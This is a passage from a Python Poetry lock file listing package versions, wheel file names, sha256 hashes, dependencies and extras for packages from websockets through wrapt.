"sha256:dff6cdf35e31d1315790149fee351f9e52978130cef6c87c4b6c9b3baf78bc53"}, {file = "websockets-12.0-cp311-cp311-win32.whl", hash = "sha256:3e3aa8c468af01d70332a382350ee95f6986db479ce7af14d5e81ec52aa2b402"}, {file = "websockets-12.0-cp311-cp311-win_amd64.whl", hash = "sha256:25eb766c8ad27da0f79420b2af4b85d29914ba0edf69f547cc4f06ca6f1d403b"}, {file = "websockets-12.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:0e6e2711d5a8e6e482cacb927a49a3d432345dfe7dea8ace7b5790df5932e4df"}, {file = "websockets-12.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:dbcf72a37f0b3316e993e13ecf32f10c0e1259c28ffd0a85cee26e8549595fbc"}, {file = "websockets-12.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:12743ab88ab2af1d17dd4acb4645677cb7063ef4db93abffbf164218a5d54c6b"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7b645f491f3c48d3f8a00d1fce07445fab7347fec54a3e65f0725d730d5b99cb"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9893d1aa45a7f8b3bc4510f6ccf8db8c3b62120917af15e3de247f0780294b92"}, {file = "websockets-12.0-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f38a7b376117ef7aff996e737583172bdf535932c9ca021746573bce40165ed"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:f764ba54e33daf20e167915edc443b6f88956f37fb606449b4a5b10ba42235a5"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:1e4b3f8ea6a9cfa8be8484c9221ec0257508e3a1ec43c36acdefb2a9c3b00aa2"}, {file = "websockets-12.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:9fdf06fd06c32205a07e47328ab49c40fc1407cdec801d698a7c41167ea45113"}, {file = "websockets-12.0-cp312-cp312-win32.whl", hash = "sha256:baa386875b70cbd81798fa9f71be689c1bf484f65fd6fb08d051a0ee4e79924d"}, {file = 
"websockets-12.0-cp312-cp312-win_amd64.whl", hash = "sha256:ae0a5da8f35a5be197f328d4727dbcfafa53d1824fac3d96cdd3a642fe09394f"}, {file = "websockets-12.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5f6ffe2c6598f7f7207eef9a1228b6f5c818f9f4d53ee920aacd35cec8110438"}, {file = "websockets-12.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9edf3fc590cc2ec20dc9d7a45108b5bbaf21c0d89f9fd3fd1685e223771dc0b2"}, {file = "websockets-12.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8572132c7be52632201a35f5e08348137f658e5ffd21f51f94572ca6c05ea81d"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:604428d1b87edbf02b233e2c207d7d528460fa978f9e391bd8aaf9c8311de137"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1a9d160fd080c6285e202327aba140fc9a0d910b09e423afff4ae5cbbf1c7205"}, {file = "websockets-12.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:87b4aafed34653e465eb77b7c93ef058516cb5acf3eb21e42f33928616172def"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b2ee7288b85959797970114deae81ab41b731f19ebcd3bd499ae9ca0e3f1d2c8"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:7fa3d25e81bfe6a89718e9791128398a50dec6d57faf23770787ff441d851967"}, {file = "websockets-12.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:a571f035a47212288e3b3519944f6bf4ac7bc7553243e41eac50dd48552b6df7"}, {file = "websockets-12.0-cp38-cp38-win32.whl", hash = "sha256:3c6cc1360c10c17463aadd29dd3af332d4a1adaa8796f6b0e9f9df1fdb0bad62"}, {file = "websockets-12.0-cp38-cp38-win_amd64.whl", hash = "sha256:1bf386089178ea69d720f8db6199a0504a406209a0fc23e603b27b300fdd6892"}, {file = "websockets-12.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:ab3d732ad50a4fbd04a4490ef08acd0517b6ae6b77eb967251f4c263011a990d"}, {file = "websockets-12.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:a1d9697f3337a89691e3bd8dc56dea45a6f6d975f92e7d5f773bc715c15dde28"}, {file = "websockets-12.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:1df2fbd2c8a98d38a66f5238484405b8d1d16f929bb7a33ed73e4801222a6f53"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:23509452b3bc38e3a057382c2e941d5ac2e01e251acce7adc74011d7d8de434c"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2e5fc14ec6ea568200ea4ef46545073da81900a2b67b3e666f04adf53ad452ec"}, {file = "websockets-12.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:46e71dbbd12850224243f5d2aeec90f0aaa0f2dde5aeeb8fc8df21e04d99eff9"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:b81f90dcc6c85a9b7f29873beb56c94c85d6f0dac2ea8b60d995bd18bf3e2aae"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a02413bc474feda2849c59ed2dfb2cddb4cd3d2f03a2fedec51d6e959d9b608b"}, {file = "websockets-12.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bbe6013f9f791944ed31ca08b077e26249309639313fff132bfbf3ba105673b9"}, {file = "websockets-12.0-cp39-cp39-win32.whl", hash = "sha256:cbe83a6bbdf207ff0541de01e11904827540aa069293696dd528a6640bd6a5f6"}, {file = "websockets-12.0-cp39-cp39-win_amd64.whl", hash = "sha256:fc4e7fa5414512b481a2483775a8e8be7803a35b30ca805afa4998a84f9fd9e8"}, {file = 
"websockets-12.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:248d8e2446e13c1d4326e0a6a4e9629cb13a11195051a73acf414812700badbd"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f44069528d45a933997a6fef143030d8ca8042f0dfaad753e2906398290e2870"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c4e37d36f0d19f0a4413d3e18c0d03d0c268ada2061868c1e6f5ab1a6d575077"}, {file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d829f975fc2e527a3ef2f9c8f25e553eb7bc779c6665e8e1d52aa22800bb38b"}, {file = "websockets-12.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:2c71bd45a777433dd9113847af751aae36e448bc6b8c361a566cb043eda6ec30"}, {file = "websockets-12.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:0bee75f400895aef54157b36ed6d3b308fcab62e5260703add87f44cee9c82a6"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:423fc1ed29f7512fceb727e2d2aecb952c46aa34895e9ed96071821309951123"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:27a5e9964ef509016759f2ef3f2c1e13f403725a5e6a1775555994966a66e931"}, {file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3181df4583c4d3994d31fb235dc681d2aaad744fbdbf94c4802485ececdecf2"}, {file = "websockets-12.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:b067cb952ce8bf40115f6c19f478dc71c5e719b7fbaa511359795dfd9d1a6468"}, {file = "websockets-12.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:00700340c6c7ab788f176d118775202aadea7602c5cc6be6ae127761c16d6b0b"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e469d01137942849cff40517c97a30a93ae79917752b34029f0ec72df6b46399"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffefa1374cd508d633646d51a8e9277763a9b78ae71324183693959cf94635a7"}, {file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba0cab91b3956dfa9f512147860783a1829a8d905ee218a9837c18f683239611"}, {file = "websockets-12.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:2cb388a5bfb56df4d9a406783b7f9dbefb888c09b71629351cc6b036e9259370"}, {file = "websockets-12.0-py3-none-any.whl", hash = "sha256:dc284bbc8d7c78a6c69e0c7325ab46ee5e40bb4d50e494d8131a07ef47500e9e"}, {file = "websockets-12.0.tar.gz", hash = "sha256:81df9cbcbb6c260de1e007e58c011bfebe2dafc8435107b0537f393dd38c8b1b"}, ] [[package]] name = "werkzeug" version = "3.0.1" description = "The comprehensive WSGI web application library." 
optional = true python-versions = ">=3.8" files = [ {file = "werkzeug-3.0.1-py3-none-any.whl", hash = "sha256:90a285dc0e42ad56b34e696398b8122ee4c681833fb35b8334a095d82c56da10"}, {file = "werkzeug-3.0.1.tar.gz", hash = "sha256:507e811ecea72b18a404947aded4b3390e1db8f826b494d76550ef45bb3b1dcc"}, ] [package.dependencies] MarkupSafe = ">=2.1.1" [package.extras] watchdog = ["watchdog (>=2.3)"] [[package]] name = "wget" version = "3.2" description = "pure python download utility" optional = true python-versions = "*" files = [ {file = "wget-3.2.zip", hash = "sha256:35e630eca2aa50ce998b9b1a127bb26b30dfee573702782aa982f875e3f16061"}, ] [[package]] name = "wheel" version = "0.41.2" description = "A built-package format for Python" optional = true python-versions = ">=3.7" files = [ {file = "wheel-0.41.2-py3-none-any.whl", hash = "sha256:75909db2664838d015e3d9139004ee16711748a52c8f336b52882266540215d8"}, {file = "wheel-0.41.2.tar.gz", hash = "sha256:0c5ac5ff2afb79ac23ab82bab027a0be7b5dbcf2e54dc50efe4bf507de1f7985"}, ] [package.extras] test = ["pytest (>=6.0.0)", "setuptools (>=65)"] [[package]] name = "whylabs-client" version = "0.5.8" description = "WhyLabs API client" optional = true python-versions = ">=3.6" files = [ {file = "whylabs-client-0.5.8.tar.gz", hash = "sha256:7f71a036f88fc2e21d89e56246db7e42547b40bf1f45bb74c28532e173206525"}, {file = "whylabs_client-0.5.8-py3-none-any.whl", hash = "sha256:26b6b481eb806ed006ff29c4ed8845acdba3fccc84333419aad628a7540a9dec"}, ] [package.dependencies] python-dateutil = "*" urllib3 = ">=1.25.3" [[package]] name = "whylogs" version = "1.3.11" description = "Profile and monitor your ML data pipeline end-to-end" optional = true python-versions = ">=3.7.1,<4" files = [ {file = "whylogs-1.3.11-py3-none-any.whl", hash = "sha256:9011b2fc2023974d337633b627955d4ab2f53b796e1fc4a27c7530c3d394a315"}, {file = "whylogs-1.3.11.tar.gz", hash = "sha256:fa83af0fb84d0868d032d871ce2db83398aea9f3b220c6a5937dd1e03f3d4abb"}, ] [package.dependencies] platformdirs = ">=3.5.0,<4.0.0" protobuf = ">=3.19.4" requests = ">=2.27,<3.0" types-requests = ">=2.30.0.0,<3.0.0.0" typing-extensions = {version = ">=3.10", markers = "python_version < \"4\""} whylabs-client = ">=0.5.6,<0.6.0" whylogs-sketching = ">=3.4.1.dev3" [package.extras] all = ["Pillow (>=9.2.0,<10.0.0)", "boto3 (>=1.22.13,<2.0.0)", "faster-fifo (>=1.4.5,<2.0.0)", "fugue (>=0.8.1,<0.9.0)", "google-cloud-storage (>=2.5.0,<3.0.0)", "ipython", "mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)", "numpy", "numpy (>=1.23.2)", "orjson (>=3.8.10,<4.0.0)", "pandas", "pyarrow (>=8.0.0,<13)", "pybars3 (>=0.9,<0.10)", "pyspark (>=3.0.0,<4.0.0)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)", "scipy (>=1.5)", "scipy (>=1.9.2)"] datasets = ["pandas"] docs = ["furo (>=2022.3.4,<2023.0.0)", "ipython_genutils (>=0.2.0,<0.3.0)", "myst-parser[sphinx] (>=0.17.2,<0.18.0)", "nbconvert (>=7.0.0,<8.0.0)", "nbsphinx (>=0.8.9,<0.9.0)", "sphinx", "sphinx-autoapi", "sphinx-autobuild (>=2021.3.14,<2022.0.0)", "sphinx-copybutton (>=0.5.0,<0.6.0)", "sphinx-inline-tabs", "sphinxext-opengraph (>=0.6.3,<0.7.0)"] embeddings = ["numpy", "numpy (>=1.23.2)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)"] fugue = ["fugue (>=0.8.1,<0.9.0)"] gcs = ["google-cloud-storage (>=2.5.0,<3.0.0)"] image = ["Pillow (>=9.2.0,<10.0.0)", "numpy", "numpy (>=1.23.2)"] mlflow = ["mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)"] proc = ["faster-fifo (>=1.4.5,<2.0.0)", "orjson (>=3.8.10,<4.0.0)", "pandas"] proc-mp = ["orjson 
(>=3.8.10,<4.0.0)", "pandas"] s3 = ["boto3 (>=1.22.13,<2.0.0)"] spark = ["pyarrow (>=8.0.0,<13)", "pyspark (>=3.0.0,<4.0.0)"] viz = ["Pillow (>=9.2.0,<10.0.0)", "ipython", "numpy", "numpy (>=1.23.2)", "pybars3 (>=0.9,<0.10)", "scipy (>=1.5)", "scipy (>=1.9.2)"] [[package]] name = "whylogs-sketching" version = "3.4.1.dev3" description = "sketching library of whylogs" optional = true python-versions = "*" files = [ {file = "whylogs-sketching-3.4.1.dev3.tar.gz", hash = "sha256:40b90eb9d5e4cbbfa63f6a1f3a3332b72258d270044b79030dc5d720fddd9499"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:9c20134eda881064099264f795d60321777b5e6c2357125a7a2787c9f15db684"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e76ac4c2d0214b8de8598867e721f774cca8877267bc2a9b2d0d06950fe76bd5"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:edc2b463d926ccacb7ee2147d206850bb0cbfea8766f091e8c575ada48db1cfd"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fdc2a3bd73895d1ffac1b3028ff55aaa6b60a9ec42d7b6b5785fa140f303dec0"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:46460eefcf22bcf20b0e6208de32e358478c17b1239221eb038d434f14ec427c"}, {file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-win_amd64.whl", hash = "sha256:58b99a070429a7119a5727ac61c4e9ebcd6e92eed3d2646931a487fff3d6630e"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:531a4af8f707c1e8138a4ae41a117ba53241372bf191666a9e6b44ab6cd9e634"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ba536fca5f9578fa34d106c243fdccfef7d75b9d1fffb9d93df0debfe8e3ebc"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:afa843c68cafa08e82624e6a33d13ab7f00ad0301101960872fe152d5af5ab53"}, {file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-win_amd64.whl", hash = "sha256:303d55c37565340c2d21c268c64a712fad612504cc4b98b1d1df848cac6d934f"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:9d65fcf8dade1affe50181582b8894929993e37d7daa922d973a811790cd0208"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4845e77c208ae64ada9170e1b92ed0abe28fe311c0fc35f9d8efa6926211ca2"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:02cac1c87ac42d7fc7e6597862ac50bc035825988d21e8a2d763b416e83e845f"}, {file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-win_amd64.whl", hash = "sha256:52a174784e69870543fb87910e5549759f01a7f4cb6cac1773b2cc194ec0b72f"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0931fc7500b78baf8f44222f1e3b58cfb707b0120328bc16cc50beaab5a954ec"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:803c104338a5c4e1c6eb077d35ca3a4443e455aa4e7f2769c93560bf135cdeb3"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:49e8f20351077497880b088dff9342f4b54d2d3c650c0b43daf121d97fb42468"}, {file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-win_amd64.whl", hash = "sha256:f9f3507b5df34de7a95b75f80009644371dd6406f9d8795e820edf8a594aeacc"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_10_9_x86_64.whl", hash 
= "sha256:2986dd5b35a93267e6d89e7aa256f714105bbe61bdb0381aeab588c2688e46b6"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:14f1bf4903e9cd2a196fe5a7268cca1434d423233e073917130d5b845f539c2a"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2ecfe0e4a629a4cefec9d7c7fac234119688085ba5f62feabed710cb5a322f8b"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:000e2c11b7bbbdefb3a343c15955868a682c02d607557fef7bad5a6ffd09a0cf"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1e70ed1ed2f9c174a80673ae2ca24c1ec0e2a01c0bd6b0728640492fd5a50178"}, {file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-win_amd64.whl", hash = "sha256:9efd56d5a21566fc49126ef54d37116078763bb9f8955b9c77421b4ca3fd8fc6"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:832247fd9d3ecf13791418a75c359db6c3aeffd51d7372d026e95f307ef286cc"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:cc81b547e331d96f6f4227280b9b5968ca4bd48dd7cb0c8b68c022037800009f"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3abf13da4347393a302843c2f06ce4e5fc56fd9c8564f64da13ceafb81eef90b"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d1d6e7d0ddb66ab725d7af63518ef6a24cd45b075b81e1d2081709df4c989853"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0b05112e3f70cfccddd2f72e464fa113307d97188891433133d4219b9f8f5456"}, {file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-win_amd64.whl", hash = "sha256:23759a00dd0e7019fbac06d9e9ab005ad6c14f80ec7935ccebccb7127296bc06"}, ] [[package]] name = "widgetsnbextension" version = "4.0.9" description = "Jupyter interactive widgets for Jupyter Notebook" optional = false python-versions = ">=3.7" files = [ {file = "widgetsnbextension-4.0.9-py3-none-any.whl", hash = "sha256:91452ca8445beb805792f206e560c1769284267a30ceb1cec9f5bcc887d15175"}, {file = "widgetsnbextension-4.0.9.tar.gz", hash = "sha256:3c1f5e46dc1166dfd40a42d685e6a51396fd34ff878742a3e47c6f0cc4a2a385"}, ] [[package]] name = "wikipedia" version = "1.4.0" description = "Wikipedia API for Python" optional = true python-versions = "*" files = [ {file = "wikipedia-1.4.0.tar.gz", hash = "sha256:db0fad1829fdd441b1852306e9856398204dc0786d2996dd2e0c8bb8e26133b2"}, ] [package.dependencies] beautifulsoup4 = "*" requests = ">=2.0.0,<3.0.0" [[package]] name = "win32-setctime" version = "1.1.0" description = "A small Python utility to set file creation time on Windows" optional = true python-versions = ">=3.5" files = [ {file = "win32_setctime-1.1.0-py3-none-any.whl", hash = "sha256:231db239e959c2fe7eb1d7dc129f11172354f98361c4fa2d6d2d7e278baa8aad"}, {file = "win32_setctime-1.1.0.tar.gz", hash = "sha256:15cf5750465118d6929ae4de4eb46e8edae9a5634350c01ba582df868e932cb2"}, ] [package.extras] dev = ["black (>=19.3b0)", "pytest (>=4.6.2)"] [[package]] name = "wolframalpha" version = "5.0.0" description = "Wolfram|Alpha 2.0 API client" optional = true python-versions = ">=3.6" files = [ {file = "wolframalpha-5.0.0-py3-none-any.whl", hash = "sha256:159f5d8fd31e4a734a34a9f3ae8aec4e9b2ef392607f82069b4a324b6b1831d5"}, {file = "wolframalpha-5.0.0.tar.gz", hash = "sha256:38bf27654039ec85cc62c199dd319b6a4d6a7badfed7af1cd161f081afdb57c0"}, ] 
[package.dependencies] "jaraco.context" = "*" more-itertools = "*" xmltodict = "*" [package.extras] docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"] testing = ["keyring", "pmxbot", "pytest (>=3.5,!=3.7.3)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=1.2.3)", "pytest-cov", "pytest-enabler", "pytest-flake8", "pytest-mypy"] [[package]] name = "wonderwords" version = "2.2.0" description = "A python package for random words and sentences in the english language" optional = true python-versions = ">=3.6" files = [ {file = "wonderwords-2.2.0-py3-none-any.whl", hash = "sha256:65fc665f1f5590e98f6d9259414ea036bf1b6dd83e51aa6ba44473c99ca92da1"}, {file = "wonderwords-2.2.0.tar.gz", hash = "sha256:0b7ec6f591062afc55603bfea71463afbab06794b3064d9f7b04d0ce251a13d0"}, ] [package.extras] cli = ["rich (==9.10.0)"] [[package]] name = "wrapt" version = "1.15.0" description = "Module for decorators, wrappers and monkey patching." optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" files = [ {file = "wrapt-1.15.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:ca1cccf838cd28d5a0883b342474c630ac48cac5df0ee6eacc9c7290f76b11c1"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:e826aadda3cae59295b95343db8f3d965fb31059da7de01ee8d1c40a60398b29"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:5fc8e02f5984a55d2c653f5fea93531e9836abbd84342c1d1e17abc4a15084c2"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:96e25c8603a155559231c19c0349245eeb4ac0096fe3c1d0be5c47e075bd4f46"}, {file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:40737a081d7497efea35ab9304b829b857f21558acfc7b3272f908d33b0d9d4c"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:f87ec75864c37c4c6cb908d282e1969e79763e0d9becdfe9fe5473b7bb1e5f09"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:1286eb30261894e4c70d124d44b7fd07825340869945c79d05bda53a40caa079"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:493d389a2b63c88ad56cdc35d0fa5752daac56ca755805b1b0c530f785767d5e"}, {file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:58d7a75d731e8c63614222bcb21dd992b4ab01a399f1f09dd82af17bbfc2368a"}, {file = "wrapt-1.15.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:21f6d9a0d5b3a207cdf7acf8e58d7d13d463e639f0c7e01d82cdb671e6cb7923"}, {file = "wrapt-1.15.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ce42618f67741d4697684e501ef02f29e758a123aa2d669e2d964ff734ee00ee"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:41d07d029dd4157ae27beab04d22b8e261eddfc6ecd64ff7000b10dc8b3a5727"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:54accd4b8bc202966bafafd16e69da9d5640ff92389d33d28555c5fd4f25ccb7"}, {file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2fbfbca668dd15b744418265a9607baa970c347eefd0db6a518aaf0cfbd153c0"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:76e9c727a874b4856d11a32fb0b389afc61ce8aaf281ada613713ddeadd1cfec"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:e20076a211cd6f9b44a6be58f7eeafa7ab5720eb796975d0c03f05b47d89eb90"}, {file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = 
"sha256:a74d56552ddbde46c246b5b89199cb3fd182f9c346c784e1a93e4dc3f5ec9975"}, {file = "wrapt-1.15.0-cp310-cp310-win32.whl", hash = "sha256:26458da5653aa5b3d8dc8b24192f574a58984c749401f98fff994d41d3f08da1"}, {file = "wrapt-1.15.0-cp310-cp310-win_amd64.whl", hash = "sha256:75760a47c06b5974aa5e01949bf7e66d2af4d08cb8c1d6516af5e39595397f5e"}, {file = "wrapt-1.15.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ba1711cda2d30634a7e452fc79eabcadaffedf241ff206db2ee93dd2c89a60e7"}, {file = "wrapt-1.15.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:56374914b132c702aa9aa9959c550004b8847148f95e1b824772d453ac204a72"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a89ce3fd220ff144bd9d54da333ec0de0399b52c9ac3d2ce34b569cf1a5748fb"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3bbe623731d03b186b3d6b0d6f51865bf598587c38d6f7b0be2e27414f7f214e"}, {file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3abbe948c3cbde2689370a262a8d04e32ec2dd4f27103669a45c6929bcdbfe7c"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b67b819628e3b748fd3c2192c15fb951f549d0f47c0449af0764d7647302fda3"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7eebcdbe3677e58dd4c0e03b4f2cfa346ed4049687d839adad68cc38bb559c92"}, {file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:74934ebd71950e3db69960a7da29204f89624dde411afbfb3b4858c1409b1e98"}, {file = "wrapt-1.15.0-cp311-cp311-win32.whl", hash = "sha256:bd84395aab8e4d36263cd1b9308cd504f6cf713b7d6d3ce25ea55670baec5416"}, {file = "wrapt-1.15.0-cp311-cp311-win_amd64.whl", hash = "sha256:a487f72a25904e2b4bbc0817ce7a8de94363bd7e79890510174da9d901c38705"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:4ff0d20f2e670800d3ed2b220d40984162089a6e2c9646fdb09b85e6f9a8fc29"}, {file = "wrapt-1.15.0-cp35-cp35m-manylinux1_x86_64.whl", hash = 